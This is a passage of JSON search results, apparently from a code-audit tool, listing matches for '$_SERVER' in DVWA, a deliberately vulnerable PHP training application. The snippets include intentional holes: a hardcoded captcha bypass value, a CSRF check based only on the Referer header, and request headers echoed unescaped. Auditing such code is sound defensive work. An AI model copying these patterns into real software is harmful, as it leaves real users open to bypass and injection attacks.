  "match": "<span class=\"line-number\">556:</span> \n<span class=\"line-number\">557:</span> <span class=\"token variable\">$DVWAUploadsWrite</span> <span class=\"token operator\">=</span> <span class=\"token string\">'[User: '</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">get_current_user</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'] Writable folder '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$PHPUploadPath</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">': &lt;span class=\"'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">is_writable</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$PHPUploadPath</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">'success\">Yes'</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">'failure\">No'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/span>'</span><span class=\"token comment\" spellcheck=\"true\">;                                     // File Upload</span>\n<span class=\"line-number\">558:</span> <span class=\"token variable\">$DVWAPHPWrite</span>     <span class=\"token operator\">=</span> <span class=\"token string\">'[User: '</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">get_current_user</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'] Writable file '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$PHPIDSPath</span> <span class=\"token 
punctuation\">.</span> <span class=\"token string\">': &lt;span class=\"'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">is_writable</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$PHPIDSPath</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">'success\">Yes'</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">'failure\">No'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/span>'</span><span class=\"token comment\" spellcheck=\"true\">;                                              // PHPIDS</span>\n<span class=\"line-number\">559:</span> \n<span class=\"line-number\">560:</span> <span class=\"token variable\">$DVWAOS</span>           <span class=\"token operator\">=</span> <span class=\"token string\">'Operating system: &lt;em>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">strtoupper</span><span class=\"token punctuation\">(</span> substr <span class=\"token punctuation\">(</span>PHP_OS<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">3</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span><span class=\"token operator\">=</span> <span class=\"token string\">'WIN'</span> <span class=\"token operator\">?</span> <span class=\"token string\">'Windows'</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">'*nix'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/em>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span 
class=\"highlight\"><span class=\"line-number\">561:</span> <span class=\"token variable\">$SERVER_NAME</span>      <span class=\"token operator\">=</span> <span class=\"token string\">'Web Server SERVER_NAME: &lt;em>'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/em>'</span><span class=\"token comment\" spellcheck=\"true\">;                                                                                                          // CSRF</span></span>\n<span class=\"line-number\">562:</span> \n<span class=\"line-number\">563:</span> <span class=\"token variable\">$MYSQL_USER</span>       <span class=\"token operator\">=</span> <span class=\"token string\">'MySQL username: &lt;em>'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'db_user'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/em>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">564:</span> <span class=\"token variable\">$MYSQL_PASS</span>       <span class=\"token operator\">=</span> <span class=\"token string\">'MySQL password: &lt;em>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'db_password'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> 
<span class=\"token string\">'******'</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">'*blank*'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/em>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">565:</span> <span class=\"token variable\">$MYSQL_DB</span>         <span class=\"token operator\">=</span> <span class=\"token string\">'MySQL database: &lt;em>'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'db_database'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/em>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">566:</span> <span class=\"token variable\">$MYSQL_SERVER</span>     <span class=\"token operator\">=</span> <span class=\"token string\">'MySQL host: &lt;em>'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'db_server'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/em>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 561,
  "start": 556,
  "end": 567,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 97,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span 
class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'hidd3n_valu3'</span> || <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_USER_AGENT'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'reCAPTCHA'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
  "line": 13,
  "start": 8,
  "end": 19,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 98,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'hidd3n_valu3'</span> || <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_USER_AGENT'</span> <span class=\"token 
punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'reCAPTCHA'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$html</span>     <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>&lt;br />The CAPTCHA was incorrect. Please try again.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t\treturn<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t}",
  "line": 18,
  "start": 13,
  "end": 24,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 109,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">24:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">27:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">28:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">29:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span 
class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">30:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">33:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {",
  "line": 28,
  "start": 23,
  "end": 34,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 123,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span 
class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {",
  "line": 13,
  "start": 8,
  "end": 19,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 135,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span 
class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {",
  "line": 13,
  "start": 8,
  "end": 19,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 168,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Checks <span class=\"token keyword\">to</span> see where the request came from\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stripos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_REFERER'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">,</span><span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>!<span class=\"token operator\">=</span><span class=\"token operator\">-</span><span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">6:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">7:</span> \t\t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token 
variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 191,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/file3.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">6:</span> \t<span class=\"token operator\">&lt;</span>div class<span class=\"token operator\">=</span>\\<span class=\"token string\">\"vulnerable_code_area\\\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">7:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>File <span class=\"token number\">3</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">9:</span> \t\tWelcome back <span class=\"token operator\">&lt;</span>em<span class=\"token operator\">></span><span class=\"token string\">\" . dvwaCurrentUser() . \"</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">10:</span> \t\tYour IP address is<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>em<span class=\"token operator\">></span>{<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span>}<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\"<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token 
function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'HTTP_X_FORWARDED_FOR'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SERVER</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Forwarded for: &lt;em>\"</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_X_FORWARDED_FOR'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;/em>&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> }\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Your user-agent address is: &lt;em>{$_SERVER[ 'HTTP_USER_AGENT' ]}&lt;/em>&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> <span class=\"token function\">if</span><span 
class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'HTTP_REFERER'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SERVER</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 192,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/file3.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">7:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>File <span class=\"token number\">3</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">9:</span> \t\tWelcome back <span class=\"token operator\">&lt;</span>em<span class=\"token operator\">></span><span class=\"token string\">\" . dvwaCurrentUser() . \"</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">10:</span> \t\tYour IP address is<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>em<span class=\"token operator\">></span>{<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span>}<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\"<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'HTTP_X_FORWARDED_FOR'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SERVER</span> <span class=\"token 
